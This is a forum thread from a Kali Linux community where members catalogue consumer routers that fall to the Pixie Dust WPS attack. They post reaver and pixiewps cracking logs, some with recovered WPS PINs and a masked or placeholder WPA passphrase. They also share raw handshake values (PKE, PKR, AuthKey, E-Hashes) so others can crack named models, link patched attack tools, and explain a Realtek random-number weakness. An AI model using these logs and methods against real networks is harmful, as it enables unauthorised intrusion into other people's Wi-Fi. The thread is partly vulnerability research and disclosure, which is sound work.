Thanks soxrok2212.
Member
Thanks soxrok2212.
Senior Member
Thanks... added to the list!Originally Posted by aanarchyy
Senior Member
Add to the database as attack successful.
Arris models:
TG1672
DG1670
Used in Time Warner foot print. Model not listed on wikidevi. chipset not listed in chip uid database.
I would guess ralink chipset.
Reaver mod list wps manufacturer - "Celeno Communication, Inc.", model - "CL1800".
Senior Member
Are you using pixiewps? Because if you use that and it says E-S1 and E-S2 = 00000000, then its Ralink. Otherwise is Broadcom.
Senior Member
yes pixiewps. ralink
E-S1 and E-S2 = 00000000, shown
Senior Member
Sweet thanks! I'll add them to the database
Senior Member
TG862G seems to be a bit of a hit-or-miss, this one did not accept the "secret" pin, but was still vulnerable.
I've still yet to come across one that accepted both pins.Code:[P] E-Nonce: b1:55:f2:0b:09:dd:44:63:8b:f2:e1:94:d8:90:5e:e0 [P] PKE: bd:98:1b:00:24:0a:08:96:85:92:9c:5b:21:e8:bf:7e:2e:f3:0f:6c:ea:c1:4d:85:ba:af:58:7e:63:c4:f0:92:ef:8a:90:f4:d4:5a:b0:59:33:18:ae:ac:31:9e:a0:ed:b8:16:fe:bd:9c:b6:e1:aa:0e:5a:72:c8:9d:31:89:0b:ed:1f:45:e5:34:8c:ea:74:d5:35:f4:4a:13:1d:92:81:fd:e9:4d:42:88:4b:ea:ed:ef:ff:16:aa:c0:4f:3b:8f:fe:bc:f5:e7:ec:96:7e:c7:06:4b:5a:3b:20:0a:7b:72:14:4b:75:b1:25:2e:b9:a7:41:e9:4c:67:87:07:2b:a4:7a:c6:02:c2:91:9a:60:10:d8:5e:ca:fb:87:26:b2:3f:ca:3e:94:16:3c:7c:d6:60:e1:54:11:78:78:d6:f6:95:01:10:a8:ed:11:bf:12:52:85:cc:02:77:32:2a:d3:2d:63:e3:bd:23:a1:dc:27:98:55:4c:c5:5a:ae:d4:8b:48 [P] WPS Manufacturer: ARRIS [P] WPS Model Number: RT2860 [+] Received M1 message [P] AuthKey: d5:c6:8d:34:3b:bf:9f:33:24:15:c4:3a:39:f7:84:73:b8:f1:1e:ea:02:fc:b2:1e:6f:65:fe:56:ac:df:8a:9d [+] Sending M2 message [P] E-Hash1: 74:d7:4f:96:17:d9:77:0e:2d:7e:d7:3b:67:a6:e1:0a:cb:ab:eb:f9:23:bd:69:a6:59:f2:ff:1d:27:c8:fc:8b [P] E-Hash2: f1:2e:03:65:55:9f:9c:21:73:e5:a7:4b:0a:27:ca:fe:46:d1:49:8c:c8:9b:9d:f1:17:70:61:b7:c3:8b:3d:34 [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 11 seconds [+] WPS PIN: '56276053' [+] WPA PSK: 'PASSWORD_HERE' [+] AP SSID: 'HOME-XXXX' [+] Nothing done, nothing to save.
EDIT: Noticed this one had a different chipset than the others I've seen, maybe the "secret" pin is more revision or chipset specific?
Wish i could change my nick to what it was when i was a dev on the (now very defunct) knoppix-std team...
Last edited by aanarchyy; 2015-04-08 at 05:16.
Administrator
If you want to manually patch reaver yourself:
Reaver v1.4 (Official release) #r119 ~ 2013-10-20
Homepage: https://code.google.com/p/reaver-wps/
Patch: http://pastebin.com/raw.php?i=mkeKYppU
Reaver v1.5 (Community fork) #8 - 2014-01-04
Homepage: https://code.google.com/p/reaver-wps-fork/
Patch: http://pastebin.com/raw.php?i=gQFcBbtW
This is a Kali-Linux support forum - not general IT/infosec help.
Useful Commands: OS, Networking, Hardware, Wi-Fi
Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
Hardware: Recommended 802.11 Wireless Cards
Documentation: http://docs.kali.org/ (Offline PDF version)
Bugs Reporting & Tool Requests: https://bugs.kali.org/
Kali Tool List, Versions & Man Pages: https://tools.kali.org/
Member
Thank you.
I think in the near future I might modify the program so that it won't depend on a modded version of Reaver but just on the standard one.
Administrator
For what its worth, both pixiewps and the patched version of reaver have made it into the Kali repos:
PixieWPS (New): https://bugs.kali.org/view.php?id=2203
Reaver (Patched): https://bugs.kali.org/view.php?id=2210
This is a Kali-Linux support forum - not general IT/infosec help.
Useful Commands: OS, Networking, Hardware, Wi-Fi
Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
Hardware: Recommended 802.11 Wireless Cards
Documentation: http://docs.kali.org/ (Offline PDF version)
Bugs Reporting & Tool Requests: https://bugs.kali.org/
Kali Tool List, Versions & Man Pages: https://tools.kali.org/
Junior Member
soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...
Another one to add to the list as vulnerable:-
Zyxel P-2812HNU - Wikidevi here
Code:[P] WPS Manufacturer: ZyXEL Technology, Corp. [P] WPS Model Number: V3.11(TUJ.3) [+] Received M1 message [P] AuthKey: 85:5f:fc:cb:b8:... [+] Sending M2 message [P] E-Hash1: 66:29:ae:09:ab:... [P] E-Hash2: 81:a4:d5:58:f3:... [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 3 seconds [+] WPS PIN: '37********' [+] WPA PSK: '**********' [+] AP SSID: '**********' [+] Nothing done, nothing to save.
Last edited by Calamita; 2015-04-08 at 18:07.
Senior Member
Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...
Another one to add to the list as vulnerable:-
Zyxel P-2812HNU - Wikidevi here
Code:[P] WPS Manufacturer: ZyXEL Technology, Corp. [P] WPS Model Number: V3.11(TUJ.3) [+] Received M1 message [P] AuthKey: 85:5f:fc:cb:b8:... [+] Sending M2 message [P] E-Hash1: 66:29:ae:09:ab:... [P] E-Hash2: 81:a4:d5:58:f3:... [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 3 seconds [+] WPS PIN: '37********' [+] WPA PSK: '**********' [+] AP SSID: '**********' [+] Nothing done, nothing to save.
Junior Member
Ahh ok - no worries! Thanks for your hard work on this.
I'll report back with some more vulnerable devices soon hopefully
Junior Member
Why it doesn't work on Broadcoms? I thought that the exploit was for broadcoms
model number 123456
Senior Member
If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!Ahh ok - no worries! Thanks for your hard work on this.
I'll report back with some more vulnerable devices soon hopefully
Senior Member
Is that helping you work on that flaw you mentioned you found?
BTW heres the one for that Encore i posted the other day
Code:[P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21 [P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1:b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:76:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5:a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22:b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de:56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0:35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:ba:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84:76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d:b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b3:86:9f:a4:09:ff:82:d6:c1 [P] WPS Manufacturer: ENCORE Technologies, Inc. [P] WPS Model Number: ENHWI-3GN3 [P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de:ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1 [P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b:ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96 [P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68:b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac
Senior Member
Cisco Linksys RE1000 v2, vulnerable.
ES-1, ES-2 00:00:00:00:00............................. ralink chipset. wikidevi here
Last edited by nuroo; 2015-04-08 at 20:48.
Senior Member
Unfortunately, thats Ralink, not Realtek. Thanks though.
Thanks! I'll add it now
Junior Member
Will do! I saw your post on hackforums about this too PM me your details and I'll forward any info I find to you
Senior Member
This is all the info I need.
Optional but extremely helpful information:Code:Authkey: N1 Enrollee Nonce: N2 Registrar Nonce: PKe: E-Hash1: E-Hash2:
Code:Router Manufacturer: Router Model Name/Number: Router WPS Pin:
Last edited by soxrok2212; 2015-05-06 at 21:28.
Senior Member
****, sorry. Didn't even notice...
Senior Member
the BSSID first 3 sets could be very useful as a quick ID chart. It's not included for most models on the wikidevi.
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Member
14:CF:E2:AC:E7:50
Manufacturer: Celeno Communication, Inc.
Model Number: CL1800
WPS Pin: 28944294
Vulnerable!
Senior Member
we need to know : model of chipset
model of chipset shown in the probes
thanks for your collaboration
Member
In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?
Senior Member
Probe request or m1 message in a WPS exachange
Senior Member
Check your messages, soxrok2212
Junior Member
How do I make the reaver (forked) spill out the PKR too?
Senior Member
We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"
Senior Member
So many of you probably know that I was looking into Realtek recently, and I noticed some fishy stuff that they do. First of all, Realtek APs ALL generated the SAME PKe. Not just on 1 occasion, not just on 1 AP, but multiple. All generated the same PKe. This seemed very strange and insecure. A person could find the secret number used in the DH Key exchange and this could be used for a MITM attack for instance, but it is not the actual problem.
Anyways, I contacted Dominique, send him some test data from a Realtek AP, a firmware blablabla, and he came back to me with the conclusion that Realtek can be cracked in 2 different, but similar ways.
1- Assuming the attacker does a WPS exchange in 1 second, E-S1 = E-S2 = N1 Enrollee Nonce
Wow, stupid engineering right? The actual PRNG is found here: https://github.com/skristiansson/uCl...lib/random_r.c
The seed that this generator uses is the time. So assuming everything happens in 1 second, your E-S1 and E-S1 will equal the N1 Enrollee Nonce.
2- If your exchange doesn't happen within 1 second, you can simply brute force the seed for the PRNG (kinda similar to Broadcom). All you have to do is input different times. Then, you will have E-S1 and E-S2.
Amazing. And they thought this was a secure implementation? Nope.
The only drawback for this attack is you can't use small PKr DH Keys so at the moment, you need Wireshark or just do a hex dump to get the PKr. Not that big of a deal though. Wiire updated pixiewps within about 10 minutes of me telling him all the info and has already released it, what a champ!
Member
check the fcc id on sticker and use FCC ID lookup tool.
you can find on google.
or post your FCC ID here and i'll grab it for you
Junior Member
M1, M3, M5, M7 is seen at wps_registar.c
M2, M4, M6, M8 is seen at wps_enrollee.c
The PKE is in wps_process_pubkey() of wps_registar.c so the PKR might probably be in wps_process_pubkey() of wps_enrollee.c file.
Have you tested this?
Junior Member
More awesome work all!
I've not found any Realtek AP's yet - which manufacturer have you gathered data from at the moment?
Senior Member
Right now I've only tested a Belkin F9k1105v2. I had other data to try but unfortunately they used small DH keys. Somehow, small DH keys screw up Realtek cracking. Not sure why but otherwise it does work
Junior Member
I think this one is Realtek the wiki page shows it's Realtek but Reaver just show the name of the Router itself
Here is the Info:
Authkey:d3:91:85:00:01:57:be:86:5e:52:10:fe:73:ff: ae:c1:15:0d:d3:01:99:15:67:5a:b1:ba:a0:bb:85:c3:bf :f2
N1 Enrollee Nonce: 3a:ad:19:14:4f:5a:1d:87:1f:27:ed:1b:3c:fb:a6:18
PKe:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0 d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91: 66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21 :25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4 d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9: 85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a :ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:3 3:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82: 51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6 :61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:1 0:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c: eb:a9:e3:b4:22:4f:3d:89:fb:2b
E-Hash1: 83:b9:24:05:e4:d2:60:c0:c3:15:7f:70:59:e2:e0:0c:86 :54:1b:7b:81:d8:50:4c:f4:01:2e:6d:f7:3f:08:8b
E-Hash2: 40:8c:4d:b0:82:29:32:04:6e:7e:f6:91:78:65:4d:3d:dd :9a:18:26:f7:28:1b:ff:32:0b:05:e4:a6:9b:17:f1
PKr:87:10:92:c3:7c:dd:9d:00:ba:80:18:16:20:d4:f4:6 0:d6:1e:1d:f2:fe:7f:e6:ed:c5:4d:49:c6:a1:82:4a:9b: f2:05:9f:6b:27:d6:f2:ee:24:e2:1e:12:66:d5:02:25:48 :92:7e:5c:3e:9d:78:2d:b2:af:49:3b:af:4f:dd:62:e0:2 8:00:6b:4c:09:62:6e:c3:19:6e:e3:c2:c6:45:44:e2:50: 0d:40:b9:0f:a6:cc:ae:13:0e:56:10:2a:c0:07:55:1e:db :07:ad:fc:29:ef:1a:ce:59:a9:ad:27:7d:0b:73:2b:4f:1 c:17:17:de:cd:06:7c:31:34:91:e6:09:ee:97:68:67:68: 66:6f:c0:05:bf:f3:a3:4e:25:1a:fd:39:a2:9a:02:86:7d :0d:4d:c1:80:b5:da:22:f7:04:1f:12:98:e4:ad:27:56:d 4:49:8a:9f:1b:01:d6:39:dd:61:c2:53:09:99:0a:dd:f9: a0:fa:3b:3e:f3:7c:f3:7b:81:f3
Router Manufacturer: Technicolor
Router Model Name/Number:Technicolor TD5
Senior Member
Wanna help. The modded reaver makes getting the necessary keys super easy. The Realtek attack needs more info then modded reaver gives.
Is there a tool that will extract all needed data, easily for a noob? I want to help, not sure how to use wireshark.
Last edited by nuroo; 2015-04-11 at 12:41.
Senior Member
FrankenScript could do that. I'll ask Slim to add it in the next version, if it's ok with everyone, whenever he gets back...
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Senior Member
Manufacturer
Belkin International
Model
F9K1103
pixiewps attack works, small dh keys used. (good thing, cant understand wireshark yet)
wikidevi here
WI1 chip1: Ralink RT3883
WI2 chip1: Ralink RT3092
Member
I'm working on a modification of reaver to automate the whole process.
Soon I post
Member
This is a example
[+] Switching mon0 to channel 9
[?] Restore previous session for 64:70:02:53
[+] Waiting for beacon from 64:70:02:53
[+] Associated with 64:70:02:53
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
[P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
[+] Sending M2 message
[P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
[P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
I added you on skype soxrok2212
Junior Member
VULNERABLE:
Modell: Hitron CVE 360
WPS Manufacturer: Ralink Technology, Corp.
WPS Model Number: RT2860
E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:31:b2:30
PKE:f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:b d:34:a2:cd:ed:c6:79:09:f7:6f:de:75:a1:b9:4c:ef:ff: 0c:be:ff:81:e1:f6:6c:76:33:c7:6e:3c:58:79:36:af:71 :b8:20:a9:3b:11:03:0c:b9:ef:ff:3e:d8:23:29:49:62:1 3:8a:ae:1c:24:74:bf:71:89:dd:b4:ea:a7:2d:eb:04:83: fd:17:d8:84:a3:b9:11:bf:63:d8:6a:56:59:4c:bd:a2:9a :44:e8:72:95:06:82:0a:af:d3:de:45:8a:ef:6d:23:ad:3 5:12:64:39:49:e5:ab:f1:c0:07:f8:5b:5d:00:c9:d5:39: 8c:ac:79:c5:7a:40:29:fb:f5:a6:e3:c6:e5:57:cb:50:25 :ce:f1:18:8c:ae:b4:25:c3:4a:c8:5b:c3:aa:76:21:53:b 3:a1:19:14:c0:34:b8:61:21:67:c2:fa:7c:b1:a4:6a:8c: 95:97:c3:fd:4c:26:d1:97:54:52
AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d :9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73 :a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35 :8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14
NOT VULNERABLE:
Modell: E1000 - Linksys
Chip: Broadcom BCM4716B0 (300 MHz)
E-Nonce: f1:04:09:09:1b:b4:a2:57:17:9a:f9:07:4b:a4:a5:70
PKE:96:4e:dd:2c:9e:8a:a4:4d:77:cf:e5:31:65:39:9d:0 8:15:c8:da:8c:33:74:37:96:eb:b1:e5:83:b2:d4:fe:79: ee:cf:8b:7f:46:f3:c8:0e:01:04:ab:0c:f6:f5:b1:d2:11 :8c:ad:7a:4d:3d:b7:98:cb:75:4b:d7:37:37:01:05:a8:b 4:63:49:18:e2:2f:99:52:90:4a:54:9e:98:89:e3:d1:97: 11:36:a0:c8:da:9f:19:05:28:a1:5f:66:03:d4:21:a3:eb :be:b0:58:8e:8b:6b:48:c9:df:b4:a9:af:23:e5:ed:40:7 7:dc:c2:ee:c9:2f:c7:c7:a5:1e:79:ad:d4:34:fc:00:b3: f1:eb:6d:e9:64:6a:d7:7b:97:ea:d2:77:a3:e4:19:4b:64 :00:ce:6e:7b:06:02:6c:21:11:cb:8b:a5:a2:e8:8e:8f:5 4:5f:c7:23:5e:08:5d:00:4a:e1:94:e0:84:0e:6d:50:d5: 8b:f7:46:53:a2:32:22:cf:5a:f7
PKR:28:bc:09:26:90:73:5f:24:bb:23:9a:89:49:b5:aa:9 e:30:cd:98:60:eb:5e:52:a8:08:82:e4:75:b7:3f:84:5b: 87:a6:b0:f6:d2:9e:4d:9e:0e:c7:0e:99:b7:69:1e:d7:7b :11:4e:a8:d0:42:77:b8:48:43:36:b6:ec:2f:0f:4c:c3:0 3:98:c8:18:3b:07:1c:b4:7a:17:80:90:25:93:91:b5:16: 4f:0a:83:95:36:92:95:63:a1:fb:50:41:18:b3:c8:4d:bc :a5:43:32:87:93:a4:27:1d:b7:aa:08:7d:1f:7b:f7:20:2 0:e8:a7:e9:af:29:9c:44:95:af:7d:aa:02:81:bb:29:71: 34:67:07:57:c8:64:7a:01:f3:26:7f:98:a3:0a:27:aa:b8 :b8:ab:40:39:60:3a:51:82:ac:de:60:e5:ad:2a:bf:e5:2 c:9d:b4:2a:fb:ec:16:a2:b6:7f:03:bb:0e:bb:65:16:72: e8:86:3b:af:03:1d:57:87:ea:26
AuthKey: 98:e5:4a:b4:53:ad:1b:9a:56:ff:df:5c:65:0d:1d:0d:1b :6c:b3:8f:ec:a8:7e:c2:d4:34:28:96:e4:ee:5a:85
E-Hash1: 2a:5e:0d:41:71:48:2e:bf:42:c0:c7:5d:78:6e:d5:d5:0c :51:82:20:21:91:b2:2d:f0:74:e4:14:f5:fa:a9:fd
E-Hash2: 63:c7:21:cb:d7:7c:1d:0c:50:55:22:de:0e:e4:7c:d4:4a :94:7c:b7:61:97:07:7f:ed:0c:7c:7f:99:ba:4e:d0
Modell: TL-WR841N - TP-Link
E-Nonce: 9b:0f:a4:49:82:5b:5b:ff:ea:e6:ee:dc:15:75:f1:bc
PKE:e5:dd:ed:96:42:29:30:4c:d5:fe:00:94:4a:6c:44:d 5:f9:f3:72:f4:e1:cd:83:3d:4b:7c:00:e2:0b:33:95:a5: 75:1b:8c:0e:f4:0a:36:a6:1c:2d:63:36:fd:47:9a:65:3f :4a:26:3c:13:ac:85:75:01:31:94:cc:29:a2:ac:0b:eb:1 a:2c:5c:36:63:65:15:17:c2:36:6e:4a:71:65:be:ca:bd: d5:86:6b:db:f7:90:38:cd:a2:95:1f:af:12:eb:24:af:f1 :62:7c:df:8f:2a:bb:94:98:5e:65:62:39:8a:19:75:fa:a c:dd:98:36:f0:77:44:fe:59:9d:65:3a:cd:ed:d1:b7:52: c0:ed:93:99:a1:8d:54:5b:55:c5:8a:c0:0f:1e:c9:5e:e9 :cc:bd:b8:1e:88:e9:6d:06:a4:21:35:cc:a5:30:40:5d:4 d:08:e3:aa:92:0a:fd:0a:84:0f:d5:11:07:2e:fe:05:e3: 70:72:ea:fa:b9:93:60:85:8d:bf
AuthKey: 6c:fa:cd:30:17:d5:ee:87:b4:c7:ff:c9:de:8e:20:7c:95 :27:f6:62:f5:16:48:55:84:04:ef:85:33:40:54:43
E-Hash1: 89:c6:62:2d:c8:c3:b7:24:ef:ca:c7:79:2a:83:0e:f5:ed :9c:1d:a4:fd:20:b2:e1:61:a7:81:c1:f9:30:40:01
E-Hash2: cd:a0:79:3b:4e:12:f9:e2:c8:e7:14:34:51:3a:2d:75:eb :0f:c8:42:0b:de:4d:1d:1e:29:e1:4b:bd:d1:d7:72
PKR:28:bf:b7:94:77:e4:c2:9d:0e:f8:60:1e:d1:0f:22:2 4:50:b4:c9:06:26:86:62:ea:cb:6d:66:8e:92:ee:a2:8a: 0f:66:c2:72:cc:25:43:32:ee:d5:b6:37:02:f7:9f:9c:7d :5b:93:5b:b9:49:7b:1e:fd:20:87:5a:d8:ea:55:55:52:e 9:bc:56:0f:82:d2:61:fb:4f:e3:08:bd:10:52:36:8c:81: c9:e8:0b:97:c0:bd:10:30:72:cc:20:d2:31:6a:f2:8a:c0 :7c:a6:c2:8c:ae:43:0a:eb:0b:e0:13:76:40:91:ec:aa:5 5:46:83:f3:b3:c2:d8:1a:e5:20:16:a4:6c:68:d9:b0:68: e2:ef:35:74:d4:25:f3:a9:71:1c:19:e7:82:d3:c7:96:e7 :33:1d:97:20:5e:8c:58:71:ac:8f:33:3c:2a:d8:55:f6:7 4:51:1b:ff:e8:19:e0:8a:95:ad:53:03:40:a6:70:f7:22: b2:42:47:e3:1b:0d:28:64:a5:15
Modell: TL-WR1043ND - TP-Link
E-Nonce: 75:28:e8:1e:7e:9f:35:42:53:96:21:31:72:56:0d:12
PKE: 5f:48:b9:03:9b:ca:ce:5e:f2:50:05:5f:a8:ed:84:5a:91 :39:ce:b8:3c:f9:c9:0b:14:67:2d:f5:8d:72:86:d7:41:d 5:b2:4e:41:fd:9e:a2:8d:a5:5a:c2:70:78:e7:83:ab:98: 49:c2:c1:0a:17:4f:e1:b3:58:ee:71:e1:b1:99:33:69:07 :1b:3a:96:b7:dd:a6:8b:31:ce:0d:8a:a1:1a:63:ee:5b:d 3:d9:d4:27:cb:95:e8:22:ac:89:f1:d3:ba:cc:f2:8c:0d: 18:1b:e3:d9:77:df:bb:cf:dd:1e:13:81:26:b1:b3:4a:8c :85:06:40:17:29:04:04:d2:d2:5b:41:12:62:de:2d:ed:5 c:94:81:c0:21:18:c1:f6:5e:5c:9e:71:e5:66:44:12:fb: da:38:56:de:ec:c7:58:36:93:ee:b5:b0:72:5c:68:c1:81 :c1:8f:b0:c9:41:9f:d1:0a:72:92:56:d9:af:c5:d3:e4:7 8:b9:e7:91:66:d9:7e:8b:fb
PKR:
5f:45:13:03:8f:b9:52:a0:d4:6b:bf:5e:c2:54:7a:9f:1d :d8:47:19:ca:0f:47:71:3a:c4:ce:18:6c:1e:91:0f:2e:c 3:c1:60:1a:91:41:09:49:98:c1:d3:65:ab:15:21:39:1d: 69:bd:1a:5a:7e:ad:fb:f7:a7:c2:bb:65:3d:62:2e:02:fb :ea:31:23:4e:18:e4:77:24:da:6c:92:d6:d2:f0:ef:7a:4 e:6c:3e:df:c4:c5:57:a6:67:93:6b:38:15:7e:05:77:fa: f9:b4:35:06:5f:b5:6c:5a:0f:36:e0:6a:79:4b:e2:65:1b :03:cc:22:10:80:83:90:59:f4:ae:1f:41:f8:e4:ef:d3:0 1:f6:ad:17:b2:6d:04:51:57:53:3d:55:78:c4:69:50:3c: 11:db:e1:d2:f2:0f:9b:23:9c:81:2f:27:c6:bd:b8:3f:8d :b5:e7:5f:4f:63:3a:85:72:24:43:48:63:1e:95:08:c1:4 4:66:9a:11:43:6a:03:45:a4
AuthKey: 75:bf:65:6f:e9:51:a9:f9:6c:8a:ec:fa:1a:96:6b:52:19 :4c:22:6c:e5:e3:5c:c8:72:b9:bc:78:45:ba:e4:f8
E-Hash1: a0:34:b8:48:57:38:23:ea:8a:29:b7:c9:15:b3:8f:c8:52 :87:2f:08:7e:c9:57:e8:52:04:b5:f6:18:2d:71:4c
E-Hash2: b5:99:8a:6d:85:4b:63:e7:91:af:5b:be:4a:19:7e:eb:e7 :9c:04:3d:7c:6a:c2:2d:56:66:4b:f1:6a:47:a4:17
Modell: TL-WR1043 - TP-Link
E-Nonce: d4:1c:7d:7f:a7:9d:31:9f:a2:16:fb:4e:e2:6f:a2:80
PKE:5c:08:ff:c8:9f:3b:96:1d:9d:89:28:5a:9d:bf:8d:0 6:12:f6:a1:5f:01:7e:e0:34:e8:b0:d8:d8:c4:ff:be:00: c4:81:50:03:1b:a2:ac:b4:22:e2:49:71:fa:ff:01:2c:74 :62:4e:15:ad:4c:40:7d:1a:6a:af:f9:63:4f:f0:6d:f1:1 b:56:7f:47:15:94:8b:28:80:a2:dd:0a:28:a3:46:05:57: 5f:16:cd:e7:25:b7:50:e6:f9:f4:00:e8:35:6d:c4:15:82 :c2:2a:4d:8b:e2:63:2d:a1:cb:db:cd:c6:3e:8a:60:12:2 e:a8:53:96:0c:ca:8c:82:5e:42:f9:aa:db:4f:f0:de:8a: 37:5c:0d:b5:4f:7d:bb:47:a9:62:58:3d:db:31:e4:be:68 :39:5a:92:f9:75:9b:e6:50:ae:27:df:87:83:62:42:f1:1 3:3a:d5:a7:66:8c:cb:3c:9f:12:1d:76:0b:6d:eb:a5:84: 73:8a:60:33:19:ac:2a:74:2c:f8
AuthKey: 2f:0c:46:3c:ad:a0:35:b5:83:ab:02:9e:b7:ec:91:47:e4 :00:d9:ee:60:4d:40:49:76:92:eb:9f:1a:e3:84:cb
E-Hash1: 3c:72:7a:a4:9e:42:30:e2:81:1a:04:ef:e7:40:fd:de:f3 :b7:eb:0a:82:ad:0e:82:9d:b8:3f:a8:d0:d9:b5:06
E-Hash2: a4:cb:f4:96:31:fc:1f:2a:7e:7a:b2:6b:b3:1b:aa:2a:0a :87:d2:54:60:07:1b:4b:0e:d7:7a:f2:c6:a4:fc:7e
PKR:da:ab:2e:3f:67:b2:0c:e6:69:9f:13:68:e6:3a:78:c 5:c8:d7:ab:60:0f:1c:57:5f:e4:bd:b0:76:0d:a7:20:3f: 0a:b4:9f:2e:80:99:fa:06:fa:46:03:03:ea:7c:d4:fa:f8 :a6:ca:cc:74:e9:18:f7:f2:54:d2:e9:10:71:2f:5a:b6:7 1:df:1f:dc:d2:67:c8:19:45:41:d9:f7:a1:fc:e8:95:0c: 92:cd:59:4e:ae:5d:68:98:b3:8d:82:dc:ca:cc:ca:b8:79 :35:fa:a4:e0:5d:85:13:31:a2:ea:99:8d:bd:82:2c:b4:7 a:35:92:1a:84:c7:99:e8:0f:96:69:d0:14:5e:dc:31:09: 3b:a3:da:65:56:54:ad:4a:d3:1a:9e:e4:98:17:98:d4:29 :c0:8b:7c:75:30:b7:c8:fe:4a:65:5c:38:5b:1c:71:2e:3 5:a2:de:07:52:2e:6f:01:e0:1a:60:e6:b8:22:92:ca:62: cf:a7:4e:6a:46:62:43:48:f0:42
[B]
Modell: WNR2000v4 - Netgear
Chip:Atheros AR9341
E-Nonce: 99:a2:d2:0d:f9:9d:f8:35:da:4b:a7:6d:6a:01:85:23
